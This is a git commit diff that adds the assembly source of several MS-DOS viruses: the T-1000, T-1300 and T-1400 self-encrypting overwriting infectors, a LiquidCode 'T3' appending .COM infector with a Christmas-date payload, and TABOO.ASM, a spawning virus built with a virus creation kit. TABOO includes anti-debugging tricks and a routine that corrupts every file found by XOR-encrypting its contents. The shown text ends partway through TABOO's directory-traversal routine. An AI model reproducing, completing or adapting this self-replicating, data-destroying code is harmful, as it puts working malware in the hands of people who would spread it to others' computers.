Add files via upload
This commit is contained in:
parent
5dd4938a52
commit
3e7d2e8262
|
@ -0,0 +1,95 @@
|
|||
;
|
||||
; T-1000 Virus
|
||||
;
|
||||
; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Inctector.
|
||||
; When an infected program is started, the virus will infect all files in the
|
||||
; current directory and use the time counter for its encryption. It displays
|
||||
; the text "T-1000" when it is ready infecting.
|
||||
|
||||
Code Segment para 'code'
|
||||
Assume Cs:Code,Ds:Code
|
||||
|
||||
Length Equ Offset EndByte-Offset Main
|
||||
|
||||
Org 100h
|
||||
|
||||
Main: Mov Si,Offset Decrypt
|
||||
Mov Di,Si
|
||||
Mov Cl,Offset EndByte-Offset Decrypt
|
||||
On2: Lodsb
|
||||
Db 34h
|
||||
Crypt Db 0
|
||||
Stosb
|
||||
Dec Cl
|
||||
Cmp Cl,0ffh
|
||||
Jne On2
|
||||
|
||||
Decrypt:
|
||||
Mov Ah,4eh
|
||||
Push Ax
|
||||
|
||||
Encr:
|
||||
Mov Ah,2ch
|
||||
Int 21h
|
||||
Mov Crypt,Dl
|
||||
Mov Si,Offset Decrypt
|
||||
Mov Di,Offset EndByte+10
|
||||
Mov Cx,Offset EndByte-Offset Decrypt
|
||||
On3: Lodsb
|
||||
Xor Al,Crypt
|
||||
Stosb
|
||||
Dec Cx
|
||||
Cmp Cx,0ffffh
|
||||
Jne On3
|
||||
|
||||
Pop Ax
|
||||
On1: Xor Cx,Cx
|
||||
Mov Dx,Offset Nam
|
||||
Int 21h
|
||||
Jc Einde
|
||||
|
||||
Mov Ax,3d01h
|
||||
Mov Dx,9eh
|
||||
Int 21h
|
||||
Mov Bx,Ax
|
||||
|
||||
Mov Ah,40h
|
||||
Push Ax
|
||||
Mov Cx,Offset Decrypt-Offset Main
|
||||
Mov Dx,Offset Main
|
||||
Int 21h
|
||||
|
||||
Pop Ax
|
||||
Mov Cx,Offset EndByte-Offset Decrypt
|
||||
Mov Dx,Offset EndByte+10
|
||||
Int 21h
|
||||
|
||||
Mov Ah,3eh
|
||||
Int 21h
|
||||
|
||||
Mov Ah,4fh
|
||||
Push Ax
|
||||
Jmp Short Encr
|
||||
|
||||
Einde:
|
||||
Mov Ah,9
|
||||
Mov Dx,Offset Msg
|
||||
Push Cs
|
||||
Pop Ds
|
||||
Int 21h
|
||||
Int 20h
|
||||
|
||||
Msg Db 'T-1000$'
|
||||
|
||||
Nam Db '*.Com',0
|
||||
|
||||
EndByte Db 0
|
||||
|
||||
Code Ends
|
||||
End Main
|
||||
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
@ -0,0 +1,79 @@
|
|||
;
|
||||
; T-1300 Virus
|
||||
;
|
||||
; This is a non-resident overwriting self-encrypting semi-mutating .exe file
|
||||
; infector. When an infected program is run, the virus will infect all the
|
||||
; file in the current directory and displays "T-1300" when finished with
|
||||
; infecting. This is a bit more advanced virus than "T-1000" and a wildcard
|
||||
; scanstring is needed to find this virus.
|
||||
;
|
||||
S_1: Lea Si,Main
|
||||
Mov Cx,MainLen
|
||||
Length Equ $-2
|
||||
Decrypt: Xor B [Si],0
|
||||
CryptByte Equ $-1
|
||||
S_2 Equ $-2
|
||||
S_3: Inc Si
|
||||
S_4: Loop Decrypt
|
||||
CryptLen Equ $-S_1
|
||||
Main: Mov Ah,4eh
|
||||
SeekNext: Lea Dx,FileSpec
|
||||
Xor Cx,Cx
|
||||
Int 21h
|
||||
Jc Einde
|
||||
Mov Ax,3d02h
|
||||
Mov Dx,09eh
|
||||
Int 21h
|
||||
Xchg Ax,Bx
|
||||
Mov Ds,Cx
|
||||
Inc Cx
|
||||
Mov Ah,B Ds:[46ch]
|
||||
Mov Ds,Cs
|
||||
Mov B CryptByte,Ah
|
||||
Test Ah,1
|
||||
Jne NoReg
|
||||
Xor B S_1,Cl
|
||||
Xor B S_2,Cl
|
||||
Xor B S_3,Cl
|
||||
NoReg: Test Ah,2
|
||||
Jne NoXor
|
||||
Xor B Decrypt,2
|
||||
NoXor: Test Ah,4
|
||||
Jne NoLoop
|
||||
Xor B S_4,2
|
||||
NoLoop: Lea Si,Main
|
||||
Lea Di,CryptPart
|
||||
Mov Cx,MainLen
|
||||
Push Cx
|
||||
CodeIt: Lodsb
|
||||
Xor Al,Ah
|
||||
Stosb
|
||||
Loop CodeIt
|
||||
Pop Cx
|
||||
And Ax,03fffh
|
||||
Add Cx,Ax
|
||||
Mov W Length,Cx
|
||||
Mov Ah,40h
|
||||
Lea Dx,S_1
|
||||
Mov Cx,CryptLen
|
||||
Int 21h
|
||||
Mov Ah,40h
|
||||
Lea Dx,CryptPart
|
||||
Mov Cx,MainLen
|
||||
Int 21h
|
||||
Mov Ah,3eh
|
||||
Int 21h
|
||||
Mov Ah,4fh
|
||||
Jmp SeekNext
|
||||
Einde: Mov Ah,9
|
||||
Lea Dx,Msg
|
||||
Int 21h
|
||||
Ret
|
||||
|
||||
FileSpec Db '*.EXE',0
|
||||
|
||||
Msg Db 'T-1300$'
|
||||
|
||||
MainLen Equ $-Main
|
||||
|
||||
CryptPart Equ $
|
|
@ -0,0 +1,143 @@
|
|||
;
|
||||
; T-1400 Virus
|
||||
;
|
||||
; This is a non-resident overwriting self-encrypting semi-mutating .COM file
|
||||
; infector. When an infected program is run, the virus will infect all the
|
||||
; file in the current directory and displays a TridenT logo when finished with
|
||||
; infecting. This is a bit more advanced virus than "T-1300" and a wildcard
|
||||
; scanstring is needed to find this virus. It now utilizes three types of
|
||||
; encryption, instead of only the XOR loop. it now utilizes ADD, ADC, SUB and
|
||||
; SBB. the increment SI has now a new
|
||||
; possibility, CMPSB.
|
||||
;
|
||||
Beg:
|
||||
Mov Cx,MainLen
|
||||
Length Equ $-2
|
||||
S_1: Lea Si,Main
|
||||
Zaken: Clc
|
||||
Decrypt: Xor B [Si],0
|
||||
CryptByte Equ $-1
|
||||
S_2 Equ $-2
|
||||
S_3: Inc Si
|
||||
S_4: Loop Zaken
|
||||
CryptLen Equ $-Beg
|
||||
Main: Mov Ah,4eh
|
||||
SeekNext: Lea Dx,FileSpec
|
||||
Xor Cx,Cx
|
||||
Int 21h
|
||||
Jnc Yup
|
||||
Jmp Einde
|
||||
Yup: Mov Ax,3d02h
|
||||
Mov Dx,09eh
|
||||
Int 21h
|
||||
Xchg Ax,Bx
|
||||
Mov Ds,Cx
|
||||
Inc Cx
|
||||
Mov Ax,W Ds:[46ch]
|
||||
|
||||
Mov Ds,Cs
|
||||
Mov B CryptByte,Ah
|
||||
Mov B Zaken,0f8h
|
||||
|
||||
Mov B What,1
|
||||
Mov B S_2,34h
|
||||
Test Al,1
|
||||
Jne NotXor
|
||||
Test Al,32
|
||||
Jne Done
|
||||
Xor B Zaken,1
|
||||
Jmp Done
|
||||
NotXor: Mov B What,2
|
||||
Mov B S_2,04h
|
||||
Test Al,2
|
||||
Je Done
|
||||
Test Al,4
|
||||
Je ItsAdc
|
||||
Mov B What,3
|
||||
Mov B S_2,2ch
|
||||
Test Al,8
|
||||
Je Done
|
||||
Sub B S_2,20h
|
||||
ItsAdc: Add B S_2,10h
|
||||
Done: Mov B S_1,0beh
|
||||
Cmp Ah,80h
|
||||
Ja NoCMPSB
|
||||
Mov B S_3,0A6h
|
||||
Jmp Next
|
||||
NoCMPSB: Mov B S_3,46h
|
||||
Next: Test Ah,1
|
||||
Jne NoReg
|
||||
Xor B S_1,Cl
|
||||
Xor B S_2,Cl
|
||||
Cmp Ah,80h
|
||||
Jbe NoReg
|
||||
Xor B S_3,Cl
|
||||
NoReg: Test Ah,2
|
||||
Jne NoXor
|
||||
Xor B Decrypt,2
|
||||
NoXor: Test Ah,4
|
||||
Jne NoLoop
|
||||
Xor B S_4,2
|
||||
NoLoop: Test Ah,8
|
||||
Jne Ok
|
||||
Mov B S_4,0E2h
|
||||
Ok: Lea Si,Main
|
||||
Lea Di,CryptPart
|
||||
Mov Cx,MainLen
|
||||
Push Cx
|
||||
CodeIt: Lodsb
|
||||
Cmp B What,1
|
||||
Jne NeXor
|
||||
Xor Al,Ah
|
||||
Jmp Stor
|
||||
NeXor: Cmp B What,2
|
||||
Jne NeSub
|
||||
Sub Al,Ah
|
||||
Jmp Stor
|
||||
NeSub: Add Al,Ah
|
||||
Stor: Stosb
|
||||
Loop CodeIt
|
||||
Pop Cx
|
||||
And Ax,03fffh
|
||||
Add Cx,Ax
|
||||
Mov W Length,Cx
|
||||
Mov Ah,40h
|
||||
Lea Dx,Beg
|
||||
Mov Cx,CryptLen
|
||||
Int 21h
|
||||
Mov Ah,40h
|
||||
Lea Dx,CryptPart
|
||||
Mov Cx,MainLen
|
||||
Int 21h
|
||||
Mov Ah,3eh
|
||||
Int 21h
|
||||
Mov Ah,4fh
|
||||
Jmp SeekNext
|
||||
What Db 0
|
||||
Einde:
|
||||
Mov Al,3
|
||||
Int 10h
|
||||
Lea Si,Y
|
||||
R: Lodsb
|
||||
Mov Cl,8
|
||||
C: Rol Al,1
|
||||
Push Ax
|
||||
Mov Al,32
|
||||
If C Mov Al,219
|
||||
Int 29h
|
||||
Int 29h
|
||||
Pop Ax
|
||||
Loop C
|
||||
Cmp Si,E
|
||||
Jne R
|
||||
Ret
|
||||
Y: db 125,231,121,244,95,17,18,69,6,68,17,226,69,197,68,17,18,69,4,196,17,23,121,244,68
|
||||
E:
|
||||
|
||||
FileSpec Db '*.COM',0
|
||||
|
||||
Msg Db 'T-1400'
|
||||
|
||||
MainLen Equ $-Main
|
||||
|
||||
CryptPart Equ $
|
|
@ -0,0 +1,361 @@
|
|||
;LiquidCode --- T3
|
||||
;
|
||||
; Virus
|
||||
;This version:
|
||||
;Searches current directory for non-infected com files, if any found
|
||||
;it will become infected!
|
||||
;This virus has a routine which self-destructs itself and uninfects
|
||||
;the file.
|
||||
assume cs:code
|
||||
.286
|
||||
code segment "code"
|
||||
org 0100h
|
||||
start proc
|
||||
jmp v_start ;first 5 bytes |
|
||||
nop ; |
|
||||
nop ; |
|
||||
v_start:
|
||||
call $+3 ;Actual virus
|
||||
pop dx
|
||||
sub dx, 3
|
||||
push dx ;save relocation factor in BP
|
||||
pop bp ;so virus can be copied anywhere twoards
|
||||
mov si, dx ;the end of the file
|
||||
;
|
||||
; Replace first 5 bytes in memory with original
|
||||
; program code so normal program can run later
|
||||
add si, first_five
|
||||
mov di, 0100h
|
||||
mov cx, 5
|
||||
lodsb
|
||||
stosb
|
||||
loop $-2
|
||||
;see if user want to disinfect this file
|
||||
; mov si, 82h
|
||||
; lodsb
|
||||
; cmp al, "[" ;is al the code to disinfect? "["
|
||||
; jne ok_dont_disinfect
|
||||
; jmp self_kill
|
||||
ok_dont_disinfect:
|
||||
;here should be date checks to see
|
||||
;if an evil function should be unleashed!!
|
||||
mov ah, 2ah
|
||||
int 21h
|
||||
;cx year 1980-2099
|
||||
;dh month 1-12
|
||||
;dl day
|
||||
;al day of week 0=sun 1=mon -> 7=sat
|
||||
cmp dh, 12
|
||||
jne notdec
|
||||
cmp dl, 25
|
||||
jne notdec
|
||||
jmp christmas
|
||||
notdec:
|
||||
cmp dh, 4
|
||||
jne notapril
|
||||
cmp dl, 1
|
||||
jne notapril
|
||||
; jmp aprilfools
|
||||
notapril:
|
||||
|
||||
;Set the DTA
|
||||
call set_dta
|
||||
;find first file to ?infect?
|
||||
call find_first_file
|
||||
go_again:
|
||||
mov si, bp
|
||||
add si, size_
|
||||
lodsw
|
||||
cmp ax, 5
|
||||
ja gd4
|
||||
jmp resrch
|
||||
gd4:
|
||||
call open_file
|
||||
mov bx, ax
|
||||
mov al, 0
|
||||
call date_time
|
||||
mov ah, 3fh
|
||||
mov cx, 5
|
||||
mov dx, bp
|
||||
add dx, first_five
|
||||
int 21h
|
||||
;**** mov ax, 4202h
|
||||
mov cx, 0
|
||||
mov ax, 4202h
|
||||
mov dx, cx
|
||||
int 21h
|
||||
sub ax, 3
|
||||
mov si, bp
|
||||
add si, new_5
|
||||
mov [si+1], ax
|
||||
mov si, bp
|
||||
mov di, si
|
||||
add si, chkmark
|
||||
add di, mark
|
||||
mov cx, 2
|
||||
repe cmpsb
|
||||
jne INFECT
|
||||
;File found was previously infected!
|
||||
; search for new one now.
|
||||
jmp resrch
|
||||
|
||||
wipe_name:
|
||||
push di
|
||||
push ax
|
||||
push cx
|
||||
mov di, bp
|
||||
add di, name_
|
||||
mov cx, 13
|
||||
mov al, 0
|
||||
rep stosb
|
||||
pop cx
|
||||
pop ax
|
||||
pop di
|
||||
ret
|
||||
resrch:
|
||||
call wipe_name
|
||||
mov ah, 4fh
|
||||
int 21h
|
||||
jnc gd3
|
||||
jmp term_virus
|
||||
gd3:
|
||||
jmp go_again
|
||||
INFECT:
|
||||
;Time to infect the file!!
|
||||
mov si, bp
|
||||
add si, handle
|
||||
mov bx, [si]
|
||||
mov cx, vsize
|
||||
mov dx, bp
|
||||
call wipe_name
|
||||
mov ax, 4000h
|
||||
int 21h
|
||||
mov ax, 4200h
|
||||
mov cx, 0
|
||||
mov dx, cx
|
||||
int 21h
|
||||
mov dx, bp
|
||||
add dx, new_5
|
||||
mov ax, 4000h
|
||||
mov cx, 5
|
||||
int 21h
|
||||
mov al, 1
|
||||
call date_time
|
||||
mov ax, 3e00h
|
||||
int 21h
|
||||
jmp resrch
|
||||
|
||||
fndnam proc
|
||||
mov si, env
|
||||
mov ax, [si]
|
||||
mov es, ax
|
||||
mov ds, ax
|
||||
mov si, 0
|
||||
mov di, si
|
||||
__lp:
|
||||
lodsb
|
||||
cmp al, 0
|
||||
je chknxt
|
||||
stosb
|
||||
jmp __lp
|
||||
chknxt:
|
||||
stosb
|
||||
lodsb
|
||||
cmp al, 0
|
||||
je fnd1
|
||||
stosb
|
||||
jmp __lp
|
||||
fnd1:
|
||||
stosb
|
||||
__lp2:
|
||||
lodsb
|
||||
cmp al, "a"
|
||||
jae ff_
|
||||
up2:
|
||||
cmp al, "A"
|
||||
jae fff_
|
||||
up3:
|
||||
stosb
|
||||
jmp __lp2
|
||||
ff_:
|
||||
cmp al,"z"
|
||||
jbe fnd
|
||||
jmp up2
|
||||
fff_:
|
||||
cmp al, "Z"
|
||||
jbe fnd
|
||||
jmp up3
|
||||
fnd:
|
||||
mov si, di
|
||||
mov al, 0
|
||||
repne scasb
|
||||
mov dx, si
|
||||
mov di, dx
|
||||
ret
|
||||
env equ 2ch
|
||||
fndnam endp
|
||||
|
||||
|
||||
self_kill:
|
||||
;this procedure disinfects specified files
|
||||
;SI points to the name of current file on disk
|
||||
;which is infected
|
||||
call fndnam ;find name of current file from env block in memory
|
||||
jmp gd__
|
||||
abrt:
|
||||
int 20h
|
||||
gd__:
|
||||
mov ax, 3d02h
|
||||
int 21h
|
||||
jc abrt
|
||||
mov bx, ax
|
||||
mov ax, cs
|
||||
mov ds, ax
|
||||
mov es, ax
|
||||
mov cx, 5
|
||||
mov dx, bp
|
||||
add dx, first_five
|
||||
call wipe_name
|
||||
mov ax, 4000h
|
||||
int 21h
|
||||
jc abrt
|
||||
mov dx, 0
|
||||
mov cx, 0
|
||||
mov ax, 4202h
|
||||
int 21h
|
||||
jnc gd__1
|
||||
jmp abrt
|
||||
gd__1:
|
||||
sub ax, vsize
|
||||
mov dx, ax
|
||||
mov cx, 0
|
||||
mov ax, 4200h
|
||||
int 21h
|
||||
call wipe_name
|
||||
mov cx, 0
|
||||
mov ax, 4000h
|
||||
int 21h
|
||||
mov ax, 3e00h
|
||||
int 21h
|
||||
jmp term_virus
|
||||
date_time:
|
||||
pusha
|
||||
mov ah, 57h
|
||||
cmp al, 0
|
||||
je fnd__$
|
||||
mov di, bp
|
||||
mov si, di
|
||||
add di, date
|
||||
add si, time
|
||||
mov dx, [di]
|
||||
mov cx, [si]
|
||||
int 21h
|
||||
jmp ret__
|
||||
fnd__$:
|
||||
int 21h
|
||||
mov si, bp
|
||||
mov di, bp
|
||||
add si, time
|
||||
add di, date
|
||||
mov [si], cx
|
||||
mov [di], dx
|
||||
ret__:
|
||||
popa
|
||||
ret
|
||||
open_file:
|
||||
mov dx, bp
|
||||
add dx, name_
|
||||
mov ax, 3d02h
|
||||
int 21h
|
||||
jnc gd2
|
||||
jmp term_virus
|
||||
gd2:
|
||||
mov si, bp
|
||||
add si, handle
|
||||
mov [si], ax
|
||||
ret
|
||||
find_first_file:
|
||||
mov dx, bp
|
||||
mov cx, 0
|
||||
mov ah, 4eh
|
||||
add dx, all_com_files
|
||||
int 21h
|
||||
jnc gd1
|
||||
jmp term_virus
|
||||
gd1:
|
||||
ret
|
||||
set_dta:
|
||||
mov dx, bp
|
||||
mov ah, 1ah
|
||||
add dx, dta
|
||||
int 21h
|
||||
ret
|
||||
term_virus:
|
||||
mov ax, 0
|
||||
mov bx, ax
|
||||
mov cx, bx
|
||||
mov dx, cx
|
||||
mov si, 0100h
|
||||
mov di, -1
|
||||
mov bp, di
|
||||
push 0100h
|
||||
ret
|
||||
|
||||
CHRISTMAS:
|
||||
;Program Lockup
|
||||
; Exit without running program
|
||||
int 20h
|
||||
;APRILFOOLS:
|
||||
;Ha Ha delete current file
|
||||
; call fndnam
|
||||
; mov ah, 41h
|
||||
; int 21h
|
||||
; mov ax, cs
|
||||
; mov ds, ax
|
||||
; mov es, ax
|
||||
; jmp term_virus
|
||||
; Data Bank
|
||||
_fstfive:
|
||||
int 20h
|
||||
nop
|
||||
ckmrk:
|
||||
nop
|
||||
nop
|
||||
acf db "*.COM",0
|
||||
dt_ dw 0
|
||||
tme dw 0
|
||||
d_t_a:
|
||||
rfd db 21 dup (0)
|
||||
att db 0
|
||||
dw 0
|
||||
dw 0
|
||||
sz dd 0
|
||||
n_me db 13 dup (0),0
|
||||
handl dw 0
|
||||
nw_5 db 0e9h,0,0
|
||||
mrk db "<T3> "
|
||||
strain db "<tm>LiquidCode 92"
|
||||
;
|
||||
end___:
|
||||
first_five = offset _fstfive-0105h
|
||||
all_com_files = offset acf-0105h
|
||||
dta = offset d_t_a-0105h
|
||||
attribute = offset att-0105h
|
||||
time = offset tme-0105h
|
||||
date = offset dt_-0105h
|
||||
size_ = offset sz-0105h
|
||||
name_ = offset n_me-0105h
|
||||
handle = offset handl-0105h
|
||||
new_5 = offset nw_5-0105h
|
||||
mark = offset mrk-0105h
|
||||
chkmark = offset ckmrk-0105h
|
||||
vsize = offset end___-0105h
|
||||
start endp
|
||||
code ends
|
||||
end start
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
|
@ -0,0 +1,539 @@
|
|||
; TABOO.ASM -- Taboo Virus
|
||||
; Created with Nowhere Man's Virus Creation Laboratory v1.00
|
||||
; Written by Virucidal Maniac
|
||||
|
||||
virus_type equ 2 ; Spawning Virus
|
||||
is_encrypted equ 1 ; We're encrypted
|
||||
tsr_virus equ 0 ; We're not TSR
|
||||
|
||||
code segment byte public
|
||||
assume cs:code,ds:code,es:code,ss:code
|
||||
org 0100h
|
||||
|
||||
start label near
|
||||
|
||||
main proc near
|
||||
call encrypt_decrypt ; Decrypt the virus
|
||||
|
||||
start_of_code label near
|
||||
|
||||
stop_tracing: mov cx,09EBh
|
||||
mov ax,0FE05h ; Acutal move, plus a HaLT
|
||||
jmp $-2
|
||||
add ah,03Bh ; AH now equals 025h
|
||||
jmp $-10 ; Execute the HaLT
|
||||
mov bx,offset null_vector ; BX points to new routine
|
||||
push cs ; Transfer CS into ES
|
||||
pop es ; using a PUSH/POP
|
||||
int 021h
|
||||
mov al,1 ; Disable interrupt 1, too
|
||||
int 021h
|
||||
jmp short skip_null ; Hop over the loop
|
||||
null_vector: jmp $ ; An infinite loop
|
||||
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
|
||||
lock_keys: mov al,128 ; Change here screws DEBUG
|
||||
out 021h,al ; If tracing then lock keyboard
|
||||
|
||||
|
||||
mov ah,04Ah ; DOS resize memory function
|
||||
mov bx,(finish - start) / 16 + 0272h ; BX holds # of para.
|
||||
int 021h
|
||||
|
||||
mov sp,(finish - start) + 01100h ; Change top of stack
|
||||
|
||||
mov si,offset spawn_name ; SI points to true filename
|
||||
int 02Eh ; DOS execution back-door
|
||||
push ax ; Save return value for later
|
||||
|
||||
mov ax,cs ; AX holds code segment
|
||||
mov ds,ax ; Restore data segment
|
||||
mov es,ax ; Restore extra segment
|
||||
|
||||
mov cx,0003h ; Do 3 infections
|
||||
search_loop: push cx ; Save CX
|
||||
call search_files ; Find and infect a file
|
||||
pop cx ; Restore CX
|
||||
loop search_loop ; Repeat until CX is 0
|
||||
|
||||
xor ah,ah ; BIOS get time function
|
||||
int 01Ah
|
||||
test dx,0001h ; Is timer divisible by 2?
|
||||
jne no_infection ; If not then don't spread
|
||||
call search_files ; Find and infect a file
|
||||
no_infection:
|
||||
call get_day
|
||||
cmp ax,000Fh ; Did the function return 15?
|
||||
je strt00 ; If equal, do effect
|
||||
call get_cpu
|
||||
cmp ax,01E6h ; Did the function return 486?
|
||||
je strt00 ; If equal, do effect
|
||||
jmp end00 ; Otherwise skip over it
|
||||
strt00: xor ah,ah ; BIOS get time function
|
||||
int 1Ah
|
||||
xchg dx,ax ; AX holds low word of timer
|
||||
mov dx,0FFh ; Start with port 255
|
||||
out_loop: out dx,al ; OUT a value to the port
|
||||
dec dx ; Do the next port
|
||||
jne out_loop ; Repeat until DX = 0
|
||||
|
||||
end00: call get_minute
|
||||
cmp ax,001Eh ; Did the function return 30?
|
||||
jg strt01 ; If greater, do effect
|
||||
jmp end01 ; Otherwise skip over it
|
||||
strt01: mov cx,000Ah ; First argument is 10
|
||||
new_shot: push cx ; Save the current count
|
||||
mov dx,0140h ; DX holds pitch
|
||||
mov bx,0100h ; BX holds shot duration
|
||||
in al,061h ; Read the speaker port
|
||||
and al,11111100b ; Turn off the speaker bit
|
||||
fire_shot: xor al,2 ; Toggle the speaker bit
|
||||
out 061h,al ; Write AL to speaker port
|
||||
add dx,09248h ;
|
||||
mov cl,3 ;
|
||||
ror dx,cl ; Figure out the delay time
|
||||
mov cx,dx ;
|
||||
and cx,01FFh ;
|
||||
or cx,10 ;
|
||||
shoot_pause: loop shoot_pause ; Delay a bit
|
||||
dec bx ; Are we done with the shot?
|
||||
jnz fire_shot ; If not, pulse the speaker
|
||||
and al,11111100b ; Turn off the speaker bit
|
||||
out 061h,al ; Write AL to speaker port
|
||||
mov bx,0002h ; BX holds delay time (ticks)
|
||||
xor ah,ah ; Get time function
|
||||
int 1Ah ; BIOS timer interrupt
|
||||
add bx,dx ; Add current time to delay
|
||||
shoot_delay: int 1Ah ; Get the time again
|
||||
cmp dx,bx ; Are we done yet?
|
||||
jne shoot_delay ; If not, keep checking
|
||||
pop cx ; Restore the count
|
||||
loop new_shot ; Do another shot
|
||||
|
||||
end01: call get_rollover
|
||||
cmp ax,0001h ; Did the function return 1?
|
||||
je strt02 ; If equal, do effect
|
||||
jmp end02 ; Otherwise skip over it
|
||||
strt02: mov dx,00C8h ; First argument is 200
|
||||
push es ; Save ES
|
||||
mov ax,040h ; Set extra segment to 040h
|
||||
mov es,ax ; (ROM BIOS)
|
||||
mov word ptr es:[013h],dx ; Store new RAM ammount
|
||||
pop es ; Restore ES
|
||||
|
||||
end02: call get_day
|
||||
cmp ax,0007h ; Did the function return 7?
|
||||
jg strt03 ; If greater, do effect
|
||||
jmp end03 ; Otherwise skip over it
|
||||
strt03: xor bx,bx ; Clear BX
|
||||
mov si,0001h ; Second argument is 1
|
||||
push es ; Save ES
|
||||
xor ax,ax ; Set the extra segment to
|
||||
mov es,ax ; zero (ROM BIOS)
|
||||
shl bx,1 ; Convert to word index
|
||||
shl si,1 ; Convert to word index
|
||||
mov ax,word ptr [bx + 03FEh]; Zero COM port address
|
||||
xchg word ptr [si + 03FEh],ax; Put first value in second,
|
||||
mov word ptr [bx + 03FEh],ax; and second value in first!
|
||||
pop es ; Restore ES
|
||||
|
||||
end03: call get_dos_version
|
||||
or ax,ax ; Did the function return zero?
|
||||
jg strt04 ; If greater, do effect
|
||||
jmp end04 ; Otherwise skip over it
|
||||
strt04: mov dx,offset data00 ; DX points to data
|
||||
push bp ; Save BP
|
||||
mov bp,sp ; BP points to stack frame
|
||||
sub sp,4096 ; Allocate 4096-byte buffer
|
||||
push di ; Save DI
|
||||
mov ah,02Fh ; DOS get DTA function
|
||||
int 021h
|
||||
mov di,bx ; DI points to DTA
|
||||
mov ah,04Eh ; DOS find first file function
|
||||
mov cx,00100111b ; CX holds all file attributes
|
||||
int 021h
|
||||
jc corrupt_end ; If no files found then exit
|
||||
corrupt_file: mov ax,04301h ; DOS set file attributes function
|
||||
xor cx,cx ; File will have no attributes
|
||||
lea dx,[di + 01Eh] ; DX points to file name
|
||||
int 021h
|
||||
mov ax,03D02h ; DOS open file function, r/w
|
||||
lea dx,[di + 01Eh] ; DX points to file name
|
||||
int 021h
|
||||
xchg bx,ax ; Transfer file handle to AX
|
||||
c_crypt_loop: mov ah,03Fh ; DOS read from file function
|
||||
mov cx,4096 ; Read 4k of characters
|
||||
lea dx,[bp - 4096] ; DX points to the buffer
|
||||
int 021h
|
||||
or ax,ax ; Were 0 bytes read?
|
||||
je close_c_file ; If so then close it up
|
||||
push ax ; Save AX
|
||||
lea si,[bp - 4096] ; SI points to the buffer
|
||||
xor ah,ah ; BIOS get clock ticks function
|
||||
int 01Ah
|
||||
pop cx ; CX holds number of bytes read
|
||||
push cx ; Save CX
|
||||
corrupt_bytes: xor byte ptr [si],dl ; XOR byte by clock ticks
|
||||
inc si ; Do the next byte
|
||||
inc dx ; Change the key for next byte
|
||||
loop corrupt_bytes ; Repeat until buffer is done
|
||||
pop dx ; Restore DX (holds bytes read)
|
||||
push dx ; Save count for write
|
||||
mov ax,04201h ; DOS file seek function, current
|
||||
mov cx,0FFFFh ; Seeking backwards
|
||||
neg dx ; Seeking backwards
|
||||
int 021h
|
||||
mov ah,040h ; DOS write to file function
|
||||
pop cx ; CX holds number of bytes read
|
||||
lea dx,[bp - 4096] ; DX points to the buffer
|
||||
int 021h
|
||||
jmp short c_crypt_loop
|
||||
close_c_file: mov ax,05701h ; DOS set file date/time function
|
||||
mov cx,[di + 016h] ; CX holds old file time
|
||||
mov dx,[di + 018h] ; DX holds old file data
|
||||
int 021h
|
||||
mov ah,03Eh ; DOS close file function
|
||||
int 021h
|
||||
mov ax,04301h ; DOS set file attributes function
|
||||
xor ch,ch ; Clear CH for attributes
|
||||
mov cl,[di + 015h] ; CL holds old attributes
|
||||
lea dx,[di + 01Eh] ; DX points to file name
|
||||
int 021h
|
||||
mov ah,04Fh ; DOS find next file function
|
||||
int 021h
|
||||
jnc corrupt_file ; If successful do next file
|
||||
corrupt_end: pop di ; Restore DI
|
||||
mov sp,bp ; Deallocate local buffer
|
||||
pop bp ; Restore BP
|
||||
|
||||
end04: pop ax ; AL holds return value
|
||||
mov ah,04Ch ; DOS terminate function
|
||||
int 021h
|
||||
main endp
|
||||
|
||||
|
||||
db 0C3h,0FDh,0C2h,0F3h,0C7h
|
||||
|
||||
search_files proc near
|
||||
push bp ; Save BP
|
||||
mov bp,sp ; BP points to local buffer
|
||||
sub sp,64 ; Allocate 64 bytes on stack
|
||||
|
||||
mov ah,047h ; DOS get current dir function
|
||||
xor dl,dl ; DL holds drive # (current)
|
||||
lea si,[bp - 64] ; SI points to 64-byte buffer
|
||||
int 021h
|
||||
|
||||
mov ah,03Bh ; DOS change directory function
|
||||
mov dx,offset root ; DX points to root directory
|
||||
int 021h
|
||||
|
||||
call traverse ; Start the traversal
|
||||
|
||||
mov ah,03Bh ; DOS change directory function
|
||||
lea dx,[bp - 64] ; DX points to old directory
|
||||
int 021h
|
||||
|
||||
mov sp,bp ; Restore old stack pointer
|
||||
pop bp ; Restore BP
|
||||
ret ; Return to caller
|
||||
|
||||
root db "\",0 ; Root directory
|
||||
search_files endp
|
||||
|
||||
traverse proc near
|
||||
push bp ; Save BP
